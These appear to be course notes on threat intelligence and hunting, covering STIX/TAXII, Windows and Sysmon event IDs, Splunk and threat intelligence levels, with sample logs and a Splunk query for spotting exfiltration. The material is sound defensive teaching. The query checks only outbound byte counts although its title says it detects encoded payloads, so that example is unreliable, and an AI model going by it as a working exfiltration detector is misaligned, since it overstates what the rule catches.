Session 20: Threat Intelligence and Threat Hunting

Understanding TTPs in Cybersecurity
From Data to Intelligence: A Progression
STIX and TAXII: The Intelligence Sharing Framework
STIX Indicator Example: Malicious IP
Logging Fundamentals
Windows Sysinternals and System Monitoring
Windows Event Log Example: Successful Logon
Critical Windows Event IDs
Event ID 4624 Successful Logon
Event ID 4625 Failed Logon
Event ID 4670 Permission Change on Object
Event ID 4688 Process Creation
Sysmon Event Log Example: Process Creation
Essential Sysmon Event IDs
Sysmon Event ID 1 Process Creation
Sysmon Event ID 3 Network Connection
Sysmon Event ID 7 Image Loaded
Sysmon Event ID 11 File Create
Sysmon Event ID 13 Registry Value Set
SIEM: Security Information and Event Management
Splunk Architecture Components
The Forwarder
The Indexer
The Search Head
Cyber Threat Intelligence Levels
Strategic CTI
Operational CTI
Tactical CTI
Technical CTI
Splunk Query Example: Detecting Unusual Encoded Payloads

Understanding TTPs in Cybersecurity

A TTP stands for Tactics, Techniques, and Procedures, which are used to describe the behavior and methods of threat actors in cybersecurity. Tactics represent the high-level goals an attacker wants to achieve, such as gaining access or exfiltrating data. Techniques are the general methods used to accomplish these goals, like phishing or exploiting vulnerabilities. Procedures are the specific, detailed steps or tools an attacker uses to carry out a technique, for example, a particular malware variant or script. Understanding TTPs helps defenders anticipate attacks, detect malicious activity, and improve threat hunting and incident response strategies.

From Data to Intelligence: A Progression

The journey from raw data to actionable intelligence involves three distinct stages that build upon each other. A data example would be a log entry showing that the IP address 192.168.1.10 accessed a server at 03:14 AM. This is simply a raw fact with no context. Information emerges when we analyze multiple log entries and reveal that 192.168.1.10 tried to access the server 15 times outside normal hours, suggesting unusual behavior. This adds context and identifies a pattern. Intelligence is achieved when analysis shows that these access attempts match known Brute Force patterns used by a specific malware group, prompting a proactive block and alert. This represents actionable knowledge that drives defensive decisions.

STIX and TAXII: The Intelligence Sharing Framework

STIX, which stands for Structured Threat Information Expression, is a standardized language used to represent, describe, and share cyber threat information in a structured format. It focuses on the content of threat intelligence, like TTPs, indicators, and incidents. TAXII, or Trusted Automated Exchange of Intelligence Information, is a protocol for exchanging threat intelligence over networks. It focuses on transport, enabling organizations to securely share STIX-formatted data in real-time or batches.

In short, STIX defines what the intelligence is, while TAXII defines how you share it. An organization uses a TAXII server to automatically send the STIX malware report to partners daily, ensuring everyone receives the latest threat intelligence in a secure, standardized way.

An organization uses a TAXII server to automatically send the STIX malware report to partners daily, ensuring everyone receives the latest threat intelligence in a secure, standardized way.

STIX Indicator Example: Malicious IP

The following represents an indicator in STIX, showing a malicious IP associated with a malware campaign.

{
  "type": "indicator",
  "id": "indicator--12345678-abcd-1234-abcd-1234567890ab",
  "created": "2025-12-09T08:00:00.000Z",
  "modified": "2025-12-09T08:00:00.000Z",
  "name": "Malicious IP Address",
  "description": "Indicator for known C2 server used by Lumma Stealer malware",
  "pattern": "[ipv4-addr:value = '203.0.113.5']",
  "pattern_type": "stix",
  "valid_from": "2025-12-09T08:00:00.000Z"
}

Logging Fundamentals

Logging is the process of recording system, application, or security-related events as they happen. These records help track activities, errors, performance, and potential threats across an environment. Logs provide visibility for troubleshooting, monitoring, auditing, and security investigations.

Windows Sysinternals and System Monitoring

Windows Sysinternals is a collection of advanced system utilities designed to help users manage, troubleshoot, and diagnose Windows systems and applications. Among these tools, Sysmon is a Microsoft Sysinternals tool that provides deep visibility into system activity by capturing detailed telemetry such as process creation, network connections, and file modifications.

Windows Event Logs are native logs that record operating system and application actions for auditing and troubleshooting. Together, they enable defenders to correlate high-level OS events with low-level behavioral telemetry for powerful threat detection.

Windows Event Log Example: Successful Logon

The following XML structure represents a Windows Event Log entry for a successful logon event.

<Event>
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" />
    <EventID>4624</EventID>
    <Version>2</Version>
    <Level>0</Level>
    <Task>12544</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2025-12-09T05:55:22.789Z" />
    <EventRecordID>98765</EventRecordID>
    <Channel>Security</Channel>
    <Computer>DESKTOP-TEST</Computer>
    <Security />
  </System>

  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">SYSTEM</Data>
    <Data Name="SubjectDomainName">NT AUTHORITY</Data>
    <Data Name="SubjectLogonId">0x3e7</Data>

    <Data Name="TargetUserSid">S-1-5-21-123456789-987654321-123456789-1001</Data>
    <Data Name="TargetUserName">User1</Data>
    <Data Name="TargetDomainName">DESKTOP-TEST</Data>
    <Data Name="TargetLogonId">0x4f12b</Data>

    <Data Name="LogonType">10</Data>
    <Data Name="LogonProcessName">User32</Data>
    <Data Name="AuthenticationPackageName">Negotiate</Data>

    <Data Name="WorkstationName">DESKTOP-TEST</Data>
    <Data Name="IpAddress">192.168.1.15</Data>
    <Data Name="IpPort">50324</Data>

    <Data Name="LogonGuid">{B1F2A455-0011-0000-AABB-44D20010CCD1}</Data>
    <Data Name="TransmittedServices">-</Data>
    <Data Name="LmPackageName">-</Data>
    <Data Name="KeyLength">256</Data>

    <Data Name="ProcessId">0x4b0</Data>
    <Data Name="ProcessName">C:\Windows\System32\winlogon.exe</Data>
  </EventData>
</Event>

Critical Windows Event IDs

Event ID 4624 Successful Logon

This event records when a user or process successfully authenticates, helping identify normal versus suspicious logon patterns. It is valuable for spotting unusual logon types or lateral movement activities within the network.

Event ID 4625 Failed Logon

This event is triggered when an authentication attempt fails, helping detect brute-force attempts or password spraying campaigns. It is particularly useful for correlation with Event ID 4624 to identify anomalous success after multiple failures.

Event ID 4670 Permission Change on Object

This event indicates the modification of permissions on a file, registry key, or object. It is important for detecting privilege escalation or malicious ACL manipulation by threat actors.

Event ID 4688 Process Creation

This event shows a new process started on the system, revealing potential malware execution or suspicious binaries. It is essential for hunting living-off-the-land attacks where legitimate system tools are abused for malicious purposes.

Sysmon Event Log Example: Process Creation

The following XML structure demonstrates a Sysmon event capturing detailed process creation information.

<Sysmon>
  <EventData>
    <UtcTime>2025-12-09 05:43:12.123</UtcTime>
    <ProcessGuid>{E5B1F2A3-9C12-6754-0000-0010D2A45BCD}</ProcessGuid>
    <ProcessId>3428</ProcessId>
    <Image>C:\Windows\System32\cmd.exe</Image>
    <FileVersion>10.0.19041.1</FileVersion>
    <CommandLine>cmd.exe /c whoami</CommandLine>
    <CurrentDirectory>C:\Users\Public\</CurrentDirectory>
    <User>DESKTOP-TEST\User1</User>
    <LogonGuid>{4D2A34B1-98D1-0000-00F3-01D234AABBCC}</LogonGuid>
    <LogonId>0x3f239</LogonId>
    <TerminalSessionId>1</TerminalSessionId>
    <IntegrityLevel>Medium</IntegrityLevel>
    <Hashes>SHA256=7C3F0BA0C4E21F9F1E8CBA8BCE8F375093DA5AF58BBB317B7921D1ACF7E3ED67</Hashes>
    <ParentProcessGuid>{E5B1F2A3-9C12-6754-0000-0010D2A45AAA}</ParentProcessGuid>
    <ParentProcessId>1780</ParentProcessId>
    <ParentImage>C:\Windows\explorer.exe</ParentImage>
    <ParentCommandLine>C:\Windows\Explorer.EXE</ParentCommandLine>
  </EventData>
</Sysmon>

Essential Sysmon Event IDs

Sysmon Event ID 1 Process Creation

This event logs detailed information about every new process, including hashes, parent process, and command line arguments. It is critical for understanding execution chains and identifying malicious commands being executed on the system.

Sysmon Event ID 3 Network Connection

This event captures outbound network connections from processes, which is useful for detecting command and control traffic or unusual communications. It allows correlation between process activity and destination IP addresses.

Sysmon Event ID 7 Image Loaded

This event reports DLLs loaded into a process, useful for identifying malicious injections or unsigned modules. It is excellent for detecting living-off-the-land binaries abuse or persistence mechanisms.

Sysmon Event ID 11 File Create

This event tracks file creation operations, helping identify malware dropping stages or suspicious temporary file activity. It is particularly useful in ransomware investigations where file creation patterns are critical.

Sysmon Event ID 13 Registry Value Set

This event indicates registry modifications that may represent persistence mechanisms, configuration changes, or tampering. It is ideal for detecting autoruns, service changes, or malware implants that modify registry keys.

SIEM: Security Information and Event Management

A SIEM, which stands for Security Information and Event Management, is a cybersecurity solution that collects and analyzes log and event data from across an organization's IT environment. It helps detect, investigate, and respond to security threats in real-time by correlating events, generating alerts, and providing dashboards for monitoring. It combines log management, which involves storing and organizing logs, with security analytics, which focuses on detecting suspicious patterns, to give a centralized view of security posture.

Splunk Architecture Components

The Forwarder

The forwarder collects data from various sources like logs, metrics, and events, then securely sends it to the Splunk indexer. It can be lightweight or heavy, depending on processing needs and the environment's requirements.

The Indexer

The indexer receives, parses, and stores the incoming data from forwarders. It also creates indexes that allow fast searching and generates reports, alerts, and visualizations based on the indexed data.

The Search Head

The search head provides a user interface for searching, analyzing, and visualizing the indexed data. It distributes search requests across indexers and aggregates the results for the user to analyze and act upon.

Cyber Threat Intelligence Levels

Strategic CTI

Strategic CTI provides high-level insights about cyber threats to support long-term decision-making and risk management. It focuses on trends, threat actor motives, and emerging threats rather than technical details. For example, an intelligence report showing that a nation-state group is targeting critical infrastructure in a region helps executives plan defenses and allocate resources appropriately.

Operational CTI

Operational CTI delivers actionable information about specific cyber threats, campaigns, and incidents that can guide defense measures. It helps security teams anticipate attacks and respond effectively. For instance, information about an ongoing ransomware campaign targeting financial institutions enables the security team to apply targeted safeguards and protective measures.

Tactical CTI

Tactical CTI provides details about the tactics, techniques, and procedures used by attackers. It supports incident response and threat hunting by describing how attacks are executed. For example, a report showing that attackers are using phishing emails with malicious macros allows defenders to block those indicators and educate users.

Technical CTI

Technical CTI focuses on specific indicators of compromise such as IP addresses, domain names, hashes, or malware signatures. It is highly granular and used directly for automated detection and blocking. For instance, knowing that the IP address 192.168.10.5 is associated with a botnet allows a firewall to block traffic from that IP immediately.

Splunk Query Example: Detecting Unusual Encoded Payloads

The following Splunk query is designed to detect unusual encoded payloads in outbound HTTP traffic that may indicate data exfiltration or command and control communications.

index=network sourcetype=proxy method=POST
| where bytes_out > 50000
| eval suspicious_payload = if(bytes_out > 100000, "High", "Medium")
| table _time, src_ip, dest_ip, uri, bytes_out, suspicious_payload